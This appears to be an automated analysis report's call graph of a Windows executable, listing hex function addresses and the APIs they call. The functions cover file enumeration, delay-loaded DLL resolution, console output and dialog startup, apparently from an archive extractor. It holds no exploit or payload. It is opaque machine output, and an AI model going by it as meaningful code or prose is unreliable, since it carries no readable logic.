ed85c2 23571->23580 23866 ee84bd 99 API calls 23571->23866 23573 ed85e7 23572->23573 23576 ed867a 23572->23576 23572->23580 23574 ed8609 23573->23574 23573->23580 23867 ed7b66 151 API calls 23573->23867 23574->23580 23868 ee84bd 99 API calls 23574->23868 23576->23580 23844 ed5e3a 23576->23844 23580->23511 23581 ed8705 23581->23580 23850 ed826a 23581->23850 23583 ed8875 23585 eda4c6 8 API calls 23583->23585 23586 ed88e0 23583->23586 23585->23586 23854 ed7d6c 23586->23854 23588 edc991 80 API calls 23592 ed893b _memcmp 23588->23592 23589 ed8a70 23590 ed8b43 23589->23590 23597 ed8abf 23589->23597 23595 ed8b9e 23590->23595 23607 ed8b4e 23590->23607 23591 ed8a69 23871 ed1f94 74 API calls 23591->23871 23592->23580 23592->23588 23592->23589 23592->23591 23869 ed8236 82 API calls 23592->23869 23870 ed1f94 74 API calls 23592->23870 23605 ed8b30 23595->23605 23874 ed80ea 96 API calls 23595->23874 23596 ed8b9c 23599 ed9653 79 API calls 23596->23599 23600 eda180 4 API calls 23597->23600 23597->23605 23598 ed9653 79 API calls 23598->23580 23599->23580 23604 ed8af7 23600->23604 23602 ed8c74 23608 edaa88 8 API calls 23602->23608 23603 ed8c09 23603->23602 23652 ed91c1 __except_handler4 23603->23652 23875 ed9989 23603->23875 23604->23605 23872 ed9377 96 API calls 23604->23872 23605->23596 23605->23603 23607->23596 23873 ed7f26 100 API calls __except_handler4 23607->23873 23611 ed8cc3 23608->23611 23609 ed8c4c 23609->23602 23879 ed1f94 74 API calls 23609->23879 23613 edaa88 8 API calls 23611->23613 23629 ed8cd9 23613->23629 23615 ed8c62 23880 ed7061 75 API calls 23615->23880 23617 ed8d9c 23618 ed8efd 23617->23618 23619 ed8df7 23617->23619 23621 ed8f0f 23618->23621 23622 ed8f23 23618->23622 23640 ed8e27 23618->23640 23620 ed8e69 23619->23620 23624 ed8e07 23619->23624 23623 ed826a CharUpperW 23620->23623 23627 ed92e6 121 API calls 23621->23627 23628 ee2c42 75 API calls 23622->23628 23625 ed8e84 23623->23625 23626 ed8e4d 23624->23626 23632 ed8e15 23624->23632 23635 ed8ead 23625->23635 23636 ed8eb4 23625->23636 23625->23640 23626->23640 23883 ed7907 108 API calls 23626->23883 23627->23640 23631 ed8f3c 23628->23631 23629->23617 23881 ed9b21 SetFilePointer GetLastError SetEndOfFile 23629->23881 23886 ee28f1 121 API calls 23631->23886 23882 ed1f94 74 API calls 23632->23882 23884 ed7698 84 API calls __except_handler4 23635->23884 23885 ed9224 94 API calls __EH_prolog 23636->23885 23645 ed904b 23640->23645 23887 ed1f94 74 API calls 23640->23887 23642 ed9156 23644 eda444 4 API calls 23642->23644 23642->23652 23643 ed9104 23861 ed9d62 23643->23861 23646 ed91b1 23644->23646 23645->23642 23645->23643 23645->23652 23860 ed9ebf SetEndOfFile 23645->23860 23646->23652 23888 ed1f94 74 API calls 23646->23888 23649 ed914b 23650 ed96d0 75 API calls 23649->23650 23650->23642 23652->23598 23654 ed1643 23653->23654 23903 edc8ca 23654->23903 23657->23510 23659 edb087 __EH_prolog 23658->23659 23664 edea80 80 API calls 23659->23664 23661 edb099 23665 edb195 23661->23665 23664->23661 23666 edb1a7 ___scrt_get_show_window_mode 23665->23666 23669 ee0948 23666->23669 23672 ee0908 GetCurrentProcess GetProcessAffinityMask 23669->23672 23673 edb10f 23672->23673 23673->23529 23674->23532 23680 ed16d2 23675->23680 23677 ed70b9 23677->23538 23678->23547 23679->23548 23681 ed16e8 23680->23681 23692 ed1740 __vsnwprintf_l 23680->23692 23682 ed1711 23681->23682 23693 ed6e91 74 API calls __vswprintf_c_l 23681->23693 23683 ed1767 23682->23683 23689 ed172d new 23682->23689 23686 ef35de 22 API calls 23683->23686 23685 ed1707 23694 ed6efd 75 API calls 23685->23694 23688 ed176e 23686->23688 23688->23692 23696 ed6efd 75 API calls 23688->23696 23689->23692 23695 ed6efd 75 API calls 23689->23695 23692->23677 23693->23685 23694->23682 23695->23692 23696->23692 23698 ee0c56 __vswprintf_c_l 23697->23698 23698->23552 23700 eed527 23699->23700 23701 edddd1 53 API calls 23700->23701 23702 eed54a 23701->23702 23703 ed400a _swprintf 51 API calls 23702->23703 23704 eed55c 23703->23704 23705 eecb5a 16 API calls 23704->23705 23706 ee1372 23705->23706 23706->23506 23708 ed1961 23707->23708 23710 ed195d 23707->23710 23711 ed1896 23708->23711 23710->23558 23712 ed18a8 23711->23712 23713 ed18e5 23711->23713 23714 ed3aac 97 API calls 23712->23714 23719 ed3f18 23713->23719 23717 ed18c8 23714->23717 23717->23710 23723 ed3f21 23719->23723 23720 ed3aac 97 API calls 23720->23723 23721 ed1906 23721->23717 23724 ed1e00 23721->23724 23723->23720 23723->23721 23736 ee067c 23723->23736 23725 ed1e0a __EH_prolog 23724->23725 23744 ed3b3d 23725->23744 23727 ed1e34 23728 ed16d2 76 API calls 23727->23728 23729 ed1ebb 23727->23729 23730 ed1e4b 23728->23730 23729->23717 23772 ed1849 76 API calls 23730->23772 23732 ed1e63 23733 ed1e6f 23732->23733 23773 ee137a MultiByteToWideChar 23732->23773 23774 ed1849 76 API calls 23733->23774 23737 ee0683 23736->23737 23738 ee069e 23737->23738 23742 ed6e8c RaiseException __CxxThrowException@8 23737->23742 23740 ee06af SetThreadExecutionState 23738->23740 23743 ed6e8c RaiseException __CxxThrowException@8 23738->23743 23740->23723 23742->23738 23743->23740 23745 ed3b47 __EH_prolog 23744->23745 23746 ed3b5d 23745->23746 23747 ed3b79 23745->23747 23803 ed6dc1 74 API calls 23746->23803 23748 ed3dc2 23747->23748 23752 ed3ba5 23747->23752 23820 ed6dc1 74 API calls 23748->23820 23751 ed3b68 23751->23727 23752->23751 23775 ee2c42 23752->23775 23754 ed3c26 23755 ed3cb1 23754->23755 23771 ed3c1d 23754->23771 23806 edc991 23754->23806 23788 edaa88 23755->23788 23756 ed3c22 23756->23754 23805 ed2034 76 API calls 23756->23805 23758 ed3bf4 23758->23754 23758->23756 23759 ed3c12 23758->23759 23804 ed6dc1 74 API calls 23759->23804 23763 ed3cc4 23765 ed3d3e 23763->23765 23766 ed3d48 23763->23766 23792 ed92e6 23765->23792 23812 ee28f1 121 API calls 23766->23812 23769 ed3d46 23769->23771 23813 ed1f94 74 API calls 23769->23813 23814 ee1acf 23771->23814 23772->23732 23773->23733 23774->23729 23776 ee2c51 23775->23776 23778 ee2c5b 23775->23778 23821 ed6efd 75 API calls 23776->23821 23779 ee2ca2 new 23778->23779 23781 ee2c9d Concurrency::cancel_current_task 23778->23781 23787 ee2cfd ___scrt_get_show_window_mode 23778->23787 23780 ee2da9 Concurrency::cancel_current_task 23779->23780 23784 ee2cd9 23779->23784 23779->23787 23824 ef157a RaiseException 23780->23824 23823 ef157a RaiseException 23781->23823 23822 ee2b7b 75 API calls 4 library calls 23784->23822 23786 ee2dc1 23787->23758 23787->23787 23789 edaa95 23788->23789 23791 edaa9f 23788->23791 23790 eee24a new 8 API calls 23789->23790 23790->23791 23791->23763 23793 ed92f0 __EH_prolog 23792->23793 23825 ed7dc6 23793->23825 23796 ed709d 76 API calls 23797 ed9302 23796->23797 23828 edca6c 23797->23828 23799 ed935c 23799->23769 23800 ed9314 23800->23799 23802 edca6c 114 API calls 23800->23802 23837 edcc51 97 API calls __vsnwprintf_l 23800->23837 23802->23800 23803->23751 23804->23771 23805->23754 23807 edc9c4 23806->23807 23808 edc9b2 23806->23808 23839 ed6249 80 API calls 23807->23839 23838 ed6249 80 API calls 23808->23838 23811 edc9bc 23811->23755 23812->23769 23813->23771 23816 ee1ad9 23814->23816 23815 ee1af2 23840 ee075b 84 API calls 23815->23840 23816->23815 23819 ee1b06 23816->23819 23818 ee1af9 23818->23819 23820->23751 23821->23778 23822->23787 23823->23780 23824->23786 23826 edacf5 GetVersionExW 23825->23826 23827 ed7dcb 23826->23827 23827->23796 23834 edca82 __vsnwprintf_l 23828->23834 23829 edcbf7 23830 edcc1f 23829->23830 23831 edca0b 6 API calls 23829->23831 23832 ee067c SetThreadExecutionState RaiseException 23830->23832 23831->23830 23835 edcbee 23832->23835 23833 ee84bd 99 API calls 23833->23834 23834->23829 23834->23833 23834->23835 23836 edab70 89 API calls 23834->23836 23835->23800 23836->23834 23837->23800 23838->23811 23839->23811 23840->23818 23841->23568 23842->23568 23843->23565 23845 ed5e4a 23844->23845 23889 ed5d67 23845->23889 23847 ed5e7d 23849 ed5eb5 23847->23849 23894 edad65 CharUpperW CompareStringW 23847->23894 23849->23581 23851 ed8289 23850->23851 23900 ee179d CharUpperW 23851->23900 23853 ed8333 23853->23583 23855 ed7d7b 23854->23855 23856 ed7dbb 23855->23856 23901 ed7043 74 API calls 23855->23901 23856->23592 23858 ed7db3 23902 ed6dc1 74 API calls 23858->23902 23860->23643 23862 ed9d73 23861->23862 23865 ed9d82 23861->23865 23863 ed9d79 FlushFileBuffers 23862->23863 23862->23865 23863->23865 23864 ed9dfb SetFileTime 23864->23649 23865->23864 23866->23572 23867->23574 23868->23580 23869->23592 23870->23592 23871->23589 23872->23605 23873->23596 23874->23605 23876 ed998f 23875->23876 23877 ed9992 GetFileType 23875->23877 23876->23609 23878 ed99a0 23877->23878 23878->23609 23879->23615 23880->23602 23881->23617 23882->23640 23883->23640 23884->23640 23885->23640 23886->23640 23887->23645 23888->23652 23895 ed5c64 23889->23895 23891 ed5d88 23891->23847 23893 ed5c64 2 API calls 23893->23891 23894->23847 23896 ed5c6e 23895->23896 23898 ed5d56 23896->23898 23899 edad65 CharUpperW CompareStringW 23896->23899 23898->23891 23898->23893 23899->23896 23900->23853 23901->23858 23902->23856 23904 edc8db 23903->23904 23909 eda90e 84 API calls 23904->23909 23906 edc90d 23910 eda90e 84 API calls 23906->23910 23908 edc918 23909->23906 23910->23908 23912 eda5fe 23911->23912 23913 eda691 FindNextFileW 23912->23913 23914 eda621 FindFirstFileW 23912->23914 23915 eda69c GetLastError 23913->23915 23916 eda6b0 23913->23916 23917 eda638 23914->23917 23922 eda675 23914->23922 23915->23916 23916->23922 23918 edb66c 2 API calls 23917->23918 23919 eda64d 23918->23919 23920 eda66a GetLastError 23919->23920 23921 eda651 FindFirstFileW 23919->23921 23920->23922 23921->23920 23921->23922 23922->23518 23932 ee9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23923->23932 23925 ee9d21 23926 ee9d2d 23925->23926 23933 ee9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23925->23933 23926->23155 23926->23156 23928->23161 23929->23165 23930->23165 23931->23168 23932->23925 23933->23926 23934->23175 23936 ed9ef7 76 API calls 23935->23936 23937 ed1f5b 23936->23937 23938 ed19a6 97 API calls 23937->23938 23941 ed1f78 23937->23941 23939 ed1f68 23938->23939 23939->23941 23942 ed6dc1 74 API calls 23939->23942 23941->23184 23941->23185 23942->23941 23944 eeac8f GetMessageW 23943->23944 23945 eeacc8 GetDlgItem 23943->23945 23946 eeacb4 TranslateMessage DispatchMessageW 23944->23946 23947 eeaca5 IsDialogMessageW 23944->23947 23945->23195 23945->23196 23946->23945 23947->23945 23947->23946 24842 eeb8e0 93 API calls _swprintf 24843 ee8ce0 6 API calls 24847 f016e0 CloseHandle 23951 eee1f9 23952 eee203 23951->23952 23955 eedf59 23952->23955 23983 eedc67 23955->23983 23957 eedf73 23958 eedfd0 23957->23958 23969 eedff4 23957->23969 23959 eeded7 DloadReleaseSectionWriteAccess 11 API calls 23958->23959 23960 eedfdb RaiseException 23959->23960 23961 eee1c9 23960->23961 23963 eeec4a TranslatorGuardHandler 5 API calls 23961->23963 23962 eee06c LoadLibraryExA 23964 eee07f GetLastError 23962->23964 23965 eee0cd 23962->23965 23966 eee1d8 23963->23966 23971 eee0a8 23964->23971 23972 eee092 23964->23972 23968 eee0df 23965->23968 23970 eee0d8 FreeLibrary 23965->23970 23967 eee13d GetProcAddress 23974 eee14d GetLastError 23967->23974 23978 eee19b 23967->23978 23968->23967 23968->23978 23969->23962 23969->23965 23969->23968 23969->23978 23970->23968 23973 eeded7 DloadReleaseSectionWriteAccess 11 API calls 23971->23973 23972->23965 23972->23971 23975 eee0b3 RaiseException 23973->23975 23976 eee160 23974->23976 23975->23961 23976->23978 23979 eeded7 DloadReleaseSectionWriteAccess 11 API calls 23976->23979 23994 eeded7 23978->23994 23980 eee181 RaiseException 23979->23980 23981 eedc67 ___delayLoadHelper2@8 11 API calls 23980->23981 23982 eee198 23981->23982 23982->23978 23984 eedc99 23983->23984 23985 eedc73 23983->23985 23984->23957 24002 eedd15 23985->24002 23988 eedc94 24012 eedc9a 23988->24012 23991 eedf24 23992 eeec4a TranslatorGuardHandler 5 API calls 23991->23992 23993 eedf55 23992->23993 23993->23957 23995 eedf0b 23994->23995 23996 eedee9 23994->23996 23995->23961 23997 eedd15 DloadLock 8 API calls 23996->23997 23998 eedeee 23997->23998 23999 eedf06 23998->23999 24000 eede67 DloadProtectSection 3 API calls 23998->24000 24021 eedf0f 8 API calls 2 library calls 23999->24021 24000->23999 24003 eedc9a DloadUnlock 3 API calls 24002->24003 24004 eedd2a 24003->24004 24005 eeec4a TranslatorGuardHandler 5 API calls 24004->24005 24006 eedc78 24005->24006 24006->23988 24007 eede67 24006->24007 24009 eede7c DloadObtainSection 24007->24009 24008 eede82 24008->23988 24009->24008 24010 eedeb7 VirtualProtect 24009->24010 24020 eedd72 VirtualQuery GetSystemInfo 24009->24020 24010->24008 24013 eedcab 24012->24013 24014 eedca7 24012->24014 24015 eedcaf 24013->24015 24016 eedcb3 GetModuleHandleW 24013->24016 24014->23991 24015->23991 24017 eedcc9 GetProcAddress 24016->24017 24019 eedcc5 24016->24019 24018 eedcd9 GetProcAddress 24017->24018 24017->24019 24018->24019 24019->23991 24020->24010 24021->23995 24892 eeebf7 20 API calls 24849 eea8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24850 eeeac0 27 API calls pre_c_initialization 24897 efebc1 21 API calls __vswprintf_c_l 24898 ee97c0 10 API calls 24852 ef9ec0 21 API calls 24899 efb5c0 GetCommandLineA GetCommandLineW 24056 ed10d5 24061 ed5bd7 24056->24061 24062 ed5be1 __EH_prolog 24061->24062 24063 edb07d 82 API calls 24062->24063 24064 ed5bed 24063->24064 24068 ed5dcc GetCurrentProcess GetProcessAffinityMask 24064->24068 24069 eeead2 24070 eeeade ___FrameUnwindToState 24069->24070 24095 eee5c7 24070->24095 24073 eeeae5 24074 eeeb0e 24073->24074 24175 eeef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24073->24175 24080 eeeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24074->24080 24106 ef824d 24074->24106 24078 eeeb2d ___FrameUnwindToState 24079 eeebad 24114 eef020 24079->24114 24080->24079 24176 ef7243 38 API calls 2 library calls 24080->24176 24090 eeebd9 24092 eeebe2 24090->24092 24177 ef764a 28 API calls _abort 24090->24177 24178 eee73e 13 API calls 2 library calls 24092->24178 24096 eee5d0 24095->24096 24179 eeed5b IsProcessorFeaturePresent 24096->24179 24098 eee5dc 24180 ef2016 24098->24180 24100 eee5e1 24101 eee5e5 24100->24101 24189 ef80d7 24100->24189 24101->24073 24104 eee5fc 24104->24073 24109 ef8264 24106->24109 24107 eeec4a TranslatorGuardHandler 5 API calls 24108 eeeb27 24107->24108 24108->24078 24110 ef81f1 24108->24110 24109->24107 24111 ef8220 24110->24111 24112 eeec4a TranslatorGuardHandler 5 API calls 24111->24112 24113 ef8249 24112->24113 24113->24080 24302 eef350 24114->24302 24117 eeebb3 24118 ef819e 24117->24118 24304 efb290 24118->24304 24120 ef81a7 24122 eeebbc 24120->24122 24308 efb59a 38 API calls 24120->24308 24123 eed5d4 24122->24123 24429 ee00cf 24123->24429 24127 eed5f3 24478 eea335 24127->24478 24129 eed5fc 24482 ee13b3 GetCPInfo 24129->24482 24131 eed606 ___scrt_get_show_window_mode 24132 eed619 GetCommandLineW 24131->24132 24133 eed628 24132->24133 24134 eed6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24132->24134 24485 eebc84 24133->24485 24135 ed400a _swprintf 51 API calls 24134->24135 24137 eed70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24135->24137 24496 eeaded LoadBitmapW 24137->24496 24140 eed636 OpenFileMappingW 24142 eed64f MapViewOfFile 24140->24142 24143 eed696 CloseHandle 24140->24143 24141 eed6a0 24490 eed287 24141->24490 24146 eed68d UnmapViewOfFile 24142->24146 24147 eed660 __vsnwprintf_l 24142->24147 24143->24134 24146->24143 24152 eed287 2 API calls 24147->24152 24154 eed67c 24152->24154 24153 ee8835 8 API calls 24155 eed76a DialogBoxParamW 24153->24155 24154->24146 24156 eed7a4 24155->24156 24157 eed7bd 24156->24157 24158 eed7b6 Sleep 24156->24158 24160 eed7cb 24157->24160 24526 eea544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 24157->24526 24158->24157 24161 eed7ea DeleteObject 24160->24161 24162 eed7ff DeleteObject 24161->24162 24163 eed806 24161->24163 24162->24163 24164 eed849 24163->24164 24165 eed837 24163->24165 24523 eea39d 24164->24523 24527 eed2e6 6 API calls 24165->24527 24168 eed83d CloseHandle 24168->24164 24169 eed883 24170 ef757e GetModuleHandleW 24169->24170 24171 eeebcf 24170->24171 24171->24090 24172 ef76a7 24171->24172 24663 ef7424 24172->24663 24175->24073 24176->24079 24177->24092 24178->24078 24179->24098 24181 ef201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24180->24181 24193 ef310e 24181->24193 24184 ef2029 24184->24100 24186 ef2031 24187 ef203c 24186->24187 24207 ef314a DeleteCriticalSection 24186->24207 24187->24100 24235 efb73a 24189->24235 24192 ef203f 8 API calls 3 library calls 24192->24101 24195 ef3117 24193->24195 24196 ef3140 24195->24196 24197 ef2025 24195->24197 24208 ef3385 24195->24208 24213 ef314a DeleteCriticalSection 24196->24213 24197->24184 24199 ef215c 24197->24199 24228 ef329a 24199->24228 24201 ef2166 24202 ef2171 24201->24202 24233 ef3348 6 API calls try_get_function 24201->24233 24202->24186 24204 ef217f 24205 ef218c 24204->24205 24234 ef218f 6 API calls ___vcrt_FlsFree 24204->24234 24205->24186 24207->24184 24214 ef3179 24208->24214 24211 ef33bc InitializeCriticalSectionAndSpinCount 24212 ef33a8 24211->24212 24212->24195 24213->24197 24215 ef31ad 24214->24215 24218 ef31a9 24214->24218 24215->24211 24215->24212 24216 ef31cd 24216->24215 24219 ef31d9 GetProcAddress 24216->24219 24218->24215 24218->24216 24221 ef3219 24218->24221 24220 ef31e9 __crt_fast_encode_pointer 24219->24220 24220->24215 24222 ef3236 24221->24222 24223 ef3241 LoadLibraryExW 24221->24223 24222->24218 24224 ef325d GetLastError 24223->24224 24225 ef3275 24223->24225 24224->24225 24227 ef3268 LoadLibraryExW 24224->24227 24225->24222 24226 ef328c FreeLibrary 24225->24226 24226->24222 24227->24225 24229 ef3179 try_get_function 5 API calls 24228->24229 24230 ef32b4 24229->24230 24231 ef32cc TlsAlloc 24230->24231 24232 ef32bd 24230->24232 24232->24201 24233->24204 24234->24202 24238 efb757 24235->24238 24239 efb753 24235->24239 24236 eeec4a TranslatorGuardHandler 5 API calls 24237 eee5ee 24236->24237 24237->24104 24237->24192 24238->24239 24241 ef9e60 24238->24241 24239->24236 24242 ef9e6c ___FrameUnwindToState 24241->24242 24253 efa3f1 EnterCriticalSection 24242->24253 24244 ef9e73 24254 efbc39 24244->24254 24246 ef9e82 24247 ef9e91 24246->24247 24267 ef9ce9 29 API calls 24246->24267 24269 ef9ead LeaveCriticalSection _abort 24247->24269 24250 ef9e8c 24268 ef9d9f GetStdHandle GetFileType 24250->24268 24251 ef9ea2 ___FrameUnwindToState 24251->24238 24253->24244 24255 efbc45 ___FrameUnwindToState 24254->24255 24256 efbc69 24255->24256 24257 efbc52 24255->24257 24270 efa3f1 EnterCriticalSection 24256->24270 24278 ef895a 20 API calls __dosmaperr 24257->24278 24260 efbc57 24279 ef8839 26 API calls _abort 24260->24279 24262 efbc61 ___FrameUnwindToState 24262->24246 24263 efbca1 24280 efbcc8 LeaveCriticalSection _abort 24263->24280 24265 efbc75 24265->24263 24271 efbb8a 24265->24271 24267->24250 24268->24247 24269->24251 24270->24265 24272 ef85a9 __dosmaperr 20 API calls 24271->24272 24275 efbb9c 24272->24275 24273 efbba9 24274 ef84de _free 20 API calls 24273->24274 24276 efbbfb 24274->24276 24275->24273 24281 efa6ca 24275->24281 24276->24265 24278->24260 24279->24262 24280->24262 24288 efa458 24281->24288 24284 efa70f InitializeCriticalSectionAndSpinCount 24285 efa6fa 24284->24285 24286 eeec4a TranslatorGuardHandler 5 API calls 24285->24286 24287 efa726 24286->24287 24287->24275 24289 efa484 24288->24289 24290 efa488 24288->24290 24289->24290 24292 efa4a8 24289->24292 24295 efa4f4 24289->24295 24290->24284 24290->24285 24292->24290 24293 efa4b4 GetProcAddress 24292->24293 24294 efa4c4 __crt_fast_encode_pointer 24293->24294 24294->24290 24296 efa50a 24295->24296 24297 efa515 LoadLibraryExW 24295->24297 24296->24289 24298 efa532 GetLastError 24297->24298 24300 efa54a 24297->24300 24299 efa53d LoadLibraryExW 24298->24299 24298->24300 24299->24300 24300->24296 24301 efa561 FreeLibrary 24300->24301 24301->24296 24303 eef033 GetStartupInfoW 24302->24303 24303->24117 24305 efb2a2 24304->24305 24306 efb299 24304->24306 24305->24120 24309 efb188 24306->24309 24308->24120 24310 ef8fa5 _abort 38 API calls 24309->24310 24311 efb195 24310->24311 24329 efb2ae 24311->24329 24313 efb19d 24338 efaf1b 24313->24338 24316 efb1b4 24316->24305 24317 ef8518 __vswprintf_c_l 21 API calls 24318 efb1c5 24317->24318 24319 efb1f7 24318->24319 24345 efb350 24318->24345 24322 ef84de _free 20 API calls 24319->24322 24322->24316 24323 efb1f2 24355 ef895a 20 API calls __dosmaperr 24323->24355 24325 efb23b 24325->24319 24356 efadf1 26 API calls 24325->24356 24326 efb20f 24326->24325 24327 ef84de _free 20 API calls 24326->24327 24327->24325 24330 efb2ba ___FrameUnwindToState 24329->24330 24331 ef8fa5 _abort 38 API calls 24330->24331 24336 efb2c4 24331->24336 24333 efb348 ___FrameUnwindToState 24333->24313 24336->24333 24337 ef84de _free 20 API calls 24336->24337 24357 ef8566 38 API calls _abort 24336->24357 24358 efa3f1 EnterCriticalSection 24336->24358 24359 efb33f LeaveCriticalSection _abort 24336->24359 24337->24336 24339 ef3dd6 __fassign 38 API calls 24338->24339 24340 efaf2d 24339->24340 24341 efaf4e 24340->24341 24342 efaf3c GetOEMCP 24340->24342 24343 efaf65 24341->24343 24344 efaf53 GetACP 24341->24344 24342->24343 24343->24316 24343->24317 24344->24343 24346 efaf1b 40 API calls 24345->24346 24347 efb36f 24346->24347 24350 efb3c0 IsValidCodePage 24347->24350 24352 efb376 24347->24352 24354 efb3e5 ___scrt_get_show_window_mode 24347->24354 24348 eeec4a TranslatorGuardHandler 5 API calls 24349 efb1ea 24348->24349 24349->24323 24349->24326 24351 efb3d2 GetCPInfo 24350->24351 24350->24352 24351->24352 24351->24354 24352->24348 24360 efaff4 GetCPInfo 24354->24360 24355->24319 24356->24319 24358->24336 24359->24336 24366 efb02e 24360->24366 24369 efb0d8 24360->24369 24363 eeec4a TranslatorGuardHandler 5 API calls 24365 efb184 24363->24365 24365->24352 24370 efc099 24366->24370 24368 efa275 __vswprintf_c_l 43 API calls 24368->24369 24369->24363 24371 ef3dd6 __fassign 38 API calls 24370->24371 24373 efc0b9 MultiByteToWideChar 24371->24373 24374 efc0f7 24373->24374 24375 efc18f 24373->24375 24377 ef8518 __vswprintf_c_l 21 API calls 24374->24377 24380 efc118 __vsnwprintf_l ___scrt_get_show_window_mode 24374->24380 24376 eeec4a TranslatorGuardHandler 5 API calls 24375->24376 24378 efb08f 24376->24378 24377->24380 24384 efa275 24378->24384 24379 efc189 24389 efa2c0 20 API calls _free 24379->24389 24380->24379 24382 efc15d MultiByteToWideChar 24380->24382 24382->24379 24383 efc179 GetStringTypeW 24382->24383 24383->24379 24385 ef3dd6 __fassign 38 API calls 24384->24385 24386 efa288 24385->24386 24390 efa058 24386->24390 24389->24375 24391 efa073 __vswprintf_c_l 24390->24391 24392 efa099 MultiByteToWideChar 24391->24392 24393 efa0c3 24392->24393 24394 efa24d 24392->24394 24398 ef8518 __vswprintf_c_l 21 API calls 24393->24398 24400 efa0e4 __vsnwprintf_l 24393->24400 24395 eeec4a TranslatorGuardHandler 5 API calls 24394->24395 24396 efa260 24395->24396 24396->24368 24397 efa12d MultiByteToWideChar 24399 efa146 24397->24399 24412 efa199 24397->24412 24398->24400 24417 efa72c 24399->24417 24400->24397 24400->24412 24404 efa1a8 24406 ef8518 __vswprintf_c_l 21 API calls 24404->24406 24409 efa1c9 __vsnwprintf_l 24404->24409 24405 efa170 24407 efa72c __vswprintf_c_l 11 API calls 24405->24407 24405->24412 24406->24409 24407->24412 24408 efa23e 24425 efa2c0 20 API calls _free 24408->24425 24409->24408 24410 efa72c __vswprintf_c_l 11 API calls 24409->24410 24413 efa21d 24410->24413 24426 efa2c0 20 API calls _free 24412->24426 24413->24408 24414 efa22c WideCharToMultiByte 24413->24414 24414->24408 24415 efa26c 24414->24415 24427 efa2c0 20 API calls _free 24415->24427 24418 efa458 __dosmaperr 5 API calls 24417->24418 24419 efa753 24418->24419 24422 efa75c 24419->24422 24428 efa7b4 10 API calls 3 library calls 24419->24428 24421 efa79c LCMapStringW 24421->24422 24423 eeec4a TranslatorGuardHandler 5 API calls 24422->24423 24424 efa15d 24423->24424 24424->24404 24424->24405 24424->24412 24425->24412 24426->24394 24427->24412 24428->24421 24430 eee360 24429->24430 24431 ee00d9 GetModuleHandleW 24430->24431 24432 ee0154 24431->24432 24433 ee00f0 GetProcAddress 24431->24433 24434 ee0484 GetModuleFileNameW 24432->24434 24537 ef70dd 42 API calls __vsnwprintf_l 24432->24537 24435 ee0109 24433->24435 24436 ee0121 GetProcAddress 24433->24436 24438 ee04a3 24434->24438 24435->24436 24436->24432 24437 ee0133 24436->24437 24437->24432 24448 ee04d2 CompareStringW 24438->24448 24450 ee0508 GetFileAttributesW 24438->24450 24451 ee0520 24438->24451 24528 edacf5 24438->24528 24531 ee0085 24438->24531 24440 ee03be 24440->24434 24441 ee03c9 GetModuleFileNameW CreateFileW 24440->24441 24442 ee03fc SetFilePointer 24441->24442 24443 ee0478 CloseHandle 24441->24443 24442->24443 24444 ee040c ReadFile 24442->24444 24443->24434 24444->24443 24447 ee042b 24444->24447 24447->24443 24449 ee0085 2 API calls 24447->24449 24448->24438 24449->24447 24450->24438 24450->24451 24452 ee052a 24451->24452 24454 ee0560 24451->24454 24455 ee0542 GetFileAttributesW 24452->24455 24456 ee055a 24452->24456 24453 ee066f 24477 ee9da4 GetCurrentDirectoryW 24453->24477 24454->24453 24457 edacf5 GetVersionExW 24454->24457 24455->24452 24455->24456 24456->24454 24458 ee057a 24457->24458 24459 ee05e7 24458->24459 24460 ee0581 24458->24460 24461 ed400a _swprintf 51 API calls 24459->24461 24462 ee0085 2 API calls 24460->24462 24463 ee060f AllocConsole 24461->24463 24464 ee058b 24462->24464 24465 ee061c GetCurrentProcessId AttachConsole 24463->24465 24466 ee0667 ExitProcess 24463->24466 24467 ee0085 2 API calls 24464->24467 24538 ef35b3 24465->24538 24469 ee0595 24467->24469 24471 edddd1 53 API calls 24469->24471 24470 ee063d GetStdHandle WriteConsoleW Sleep FreeConsole 24470->24466 24472 ee05b0 24471->24472 24473 ed400a _swprintf 51 API calls 24472->24473 24474 ee05c3 24473->24474 24475 edddd1 53 API calls 24474->24475 24476 ee05d2 24475->24476 24476->24466 24477->24127 24479 ee0085 2 API calls 24478->24479 24480 eea349 OleInitialize 24479->24480 24481 eea36c GdiplusStartup SHGetMalloc 24480->24481 24481->24129 24483 ee13d7 IsDBCSLeadByte 24482->24483 24483->24483 24484 ee13ef 24483->24484 24484->24131 24487 eebc8e 24485->24487 24486 eebda4 24486->24140 24486->24141 24487->24486 24488 ee179d CharUpperW 24487->24488 24540 edecad 80 API calls ___scrt_get_show_window_mode 24487->24540 24488->24487 24491 eee360 24490->24491 24492 eed294 SetEnvironmentVariableW 24491->24492 24493 eed2b7 24492->24493 24494 eed2df 24493->24494 24495 eed2d3 SetEnvironmentVariableW 24493->24495 24494->24134 24495->24494 24497 eeae0e 24496->24497 24498 eeae15 24496->24498 24541 ee9e1c FindResourceW 24497->24541 24500 eeae2a 24498->24500 24501 eeae1b GetObjectW 24498->24501 24502 ee9d1a 4 API calls 24500->24502 24501->24500 24503 eeae3d 24502->24503 24504 eeae80 24503->24504 24505 eeae5c 24503->24505 24506 ee9e1c 13 API calls 24503->24506 24515 edd31c 24504->24515 24557 ee9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24505->24557 24508 eeae4d 24506->24508 24508->24505 24510 eeae53 DeleteObject 24508->24510 24509 eeae64 24558 ee9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24509->24558 24510->24505 24512 eeae6d 24559 ee9f5d 8 API calls ___scrt_get_show_window_mode 24512->24559 24514 eeae74 DeleteObject 24514->24504 24568 edd341 24515->24568 24517 edd328 24608 edda4e GetModuleHandleW FindResourceW 24517->24608 24520 ee8835 24521 eee24a new 8 API calls 24520->24521 24522 ee8854 24521->24522 24522->24153 24524 eea3cc GdiplusShutdown CoUninitialize 24523->24524 24524->24169 24526->24160 24527->24168 24529 edad09 GetVersionExW 24528->24529 24530 edad45 24528->24530 24529->24530 24530->24438 24532 eee360 24531->24532 24533 ee0092 GetSystemDirectoryW 24532->24533 24534 ee00aa 